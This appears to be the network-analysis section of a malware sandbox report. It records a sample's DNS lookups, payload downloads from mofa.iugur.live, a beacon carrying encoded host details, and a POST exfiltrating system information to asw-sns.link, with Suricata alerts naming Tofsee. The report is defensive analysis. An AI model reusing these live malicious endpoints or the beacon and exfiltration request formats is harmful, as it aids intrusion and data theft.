Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| asw-sns.link | 203.55.176.12 | |
| mofa.iugur.live | 185.163.45.56 |
- UDP Requests
-
-
192.168.56.101:54056 164.124.101.2:53
-
192.168.56.101:59369 164.124.101.2:53
-
192.168.56.101:61479 164.124.101.2:53
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:61480 239.255.255.250:3702
-
192.168.56.101:62445 239.255.255.250:1900
-
192.168.56.101:62447 239.255.255.250:3702
-
192.168.56.101:62449 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
GET
200
https://mofa.iugur.live/2623/1/45326/3/3/0/1840589382/files-72843a7a/0/data?d=
REQUEST
RESPONSE
BODY
GET /2623/1/45326/3/3/0/1840589382/files-72843a7a/0/data?d= HTTP/1.1
Host: mofa.iugur.live
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Wed, 21 Apr 2021 22:26:21 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
X-Robots-Tag: noindex, nofollow
GET
200
https://mofa.iugur.live/2623/1/45326/3/1/1/1840589382/files-52f76d0b/0/
REQUEST
RESPONSE
BODY
GET /2623/1/45326/3/1/1/1840589382/files-52f76d0b/0/ HTTP/1.1
Host: mofa.iugur.live
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Wed, 21 Apr 2021 22:26:21 GMT
Content-Type: application/octet-stream
Content-Length: 29696
Connection: keep-alive
X-Robots-Tag: noindex, nofollow
GET
200
https://mofa.iugur.live/2623/1/45326/3/3/1/1840589560/files-16aef47a/1/cuui?data=AQZ0ZXN0MjInSW50ZWwoUikgQ29yZShUTSkgaTUtODQwMCBDUFUgQCAyLjgwR0h6ATISXFwuXFBIWVNJQ0FMRFJJVkUwCzM0MzU2OTk0NTYwBzUyNDI0MjQIMTA0ODMwMDQJVEVTVDIyLVBDDDk0REUyNzhDMzI3NA==
REQUEST
RESPONSE
BODY
GET /2623/1/45326/3/3/1/1840589560/files-16aef47a/1/cuui?data=AQZ0ZXN0MjInSW50ZWwoUikgQ29yZShUTSkgaTUtODQwMCBDUFUgQCAyLjgwR0h6ATISXFwuXFBIWVNJQ0FMRFJJVkUwCzM0MzU2OTk0NTYwBzUyNDI0MjQIMTA0ODMwMDQJVEVTVDIyLVBDDDk0REUyNzhDMzI3NA== HTTP/1.1
Host: mofa.iugur.live
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Wed, 21 Apr 2021 22:26:23 GMT
Content-Type: application/octet-stream
Content-Length: 278
Connection: keep-alive
X-Robots-Tag: noindex, nofollow
GET
200
https://mofa.iugur.live/2623/1/45326/3/1/1/1840589558/files-910af97c/1/plaoi
REQUEST
RESPONSE
BODY
GET /2623/1/45326/3/1/1/1840589558/files-910af97c/1/plaoi HTTP/1.1
Host: mofa.iugur.live
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Wed, 21 Apr 2021 22:26:24 GMT
Content-Type: application/octet-stream
Content-Length: 11296
Connection: keep-alive
X-Robots-Tag: noindex, nofollow
GET
200
https://mofa.iugur.live/2623/1/45326/3/1/1/1840589558/files-4057b130/1/lkjhg
REQUEST
RESPONSE
BODY
GET /2623/1/45326/3/1/1/1840589558/files-4057b130/1/lkjhg HTTP/1.1
Host: mofa.iugur.live
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Wed, 21 Apr 2021 22:26:24 GMT
Content-Type: application/octet-stream
Content-Length: 616992
Connection: keep-alive
X-Robots-Tag: noindex, nofollow
GET
200
https://mofa.iugur.live/2623/1/45326/3/3/1/1840589560/files-a2da9285/1/lapd?data=1
REQUEST
RESPONSE
BODY
GET /2623/1/45326/3/3/1/1840589560/files-a2da9285/1/lapd?data=1 HTTP/1.1
Host: mofa.iugur.live
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Wed, 21 Apr 2021 22:26:27 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
X-Robots-Tag: noindex, nofollow
GET
200
https://mofa.iugur.live/2623/1/45326/3/3/1/1840589560/files-a2da9285/1/lapd?data=2
REQUEST
RESPONSE
BODY
GET /2623/1/45326/3/3/1/1840589560/files-a2da9285/1/lapd?data=2 HTTP/1.1
Host: mofa.iugur.live
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Wed, 21 Apr 2021 22:26:27 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
X-Robots-Tag: noindex, nofollow
POST
100
https://asw-sns.link/202/0BDXUKUO8U8p243usxNT46Yj5zTXyrUwpuXOqx92/45326/2623/14188cd3
REQUEST
RESPONSE
BODY
POST /202/0BDXUKUO8U8p243usxNT46Yj5zTXyrUwpuXOqx92/45326/2623/14188cd3 HTTP/1.1
X-File-Path: QzpcVXNlcnNcdGVzdDIyXEFwcERhdGFcUm9hbWluZ1xBdGxhc0ZpbGVzXGpiaDAxdHVoLnl0bS5zaWY=
X-File-Offset: 0
X-File-Length: 11841
X-File-Type: sysInfo
Content-Type: application/x-raw
Content-Encoding: gzip
Host: asw-sns.link
Content-Length: 3627
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
GET
404
https://asw-sns.link/202/0BDXUKUO8U8p243usxNT46Yj5zTXyrUwpuXOqx92/45326/2623/14188cd3
REQUEST
RESPONSE
BODY
GET /202/0BDXUKUO8U8p243usxNT46Yj5zTXyrUwpuXOqx92/45326/2623/14188cd3 HTTP/1.1
Host: asw-sns.link
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Server: nginx/1.19.9
Date: Wed, 21 Apr 2021 22:28:06 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9
Connection: keep-alive
Vary: Accept-Encoding
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.101:49201 -> 185.163.45.56:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
| TCP 192.168.56.101:49207 -> 203.55.176.12:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
| TCP 192.168.56.101:49206 -> 203.55.176.12:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLSv1 192.168.56.101:49201 185.163.45.56:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=*.iugur.live | e3:d0:2e:6f:dd:cc:f9:aa:87:9f:48:cc:c6:70:fc:71:9b:74:f8:ec |
|
TLSv1 192.168.56.101:49207 203.55.176.12:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=asw-sns.link | ce:10:29:73:2b:ca:8e:65:59:93:ea:2f:41:2d:91:23:4f:a2:b5:61 |
|
TLSv1 192.168.56.101:49206 203.55.176.12:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=asw-sns.link | ce:10:29:73:2b:ca:8e:65:59:93:ea:2f:41:2d:91:23:4f:a2:b5:61 |
Snort Alerts
No Snort Alerts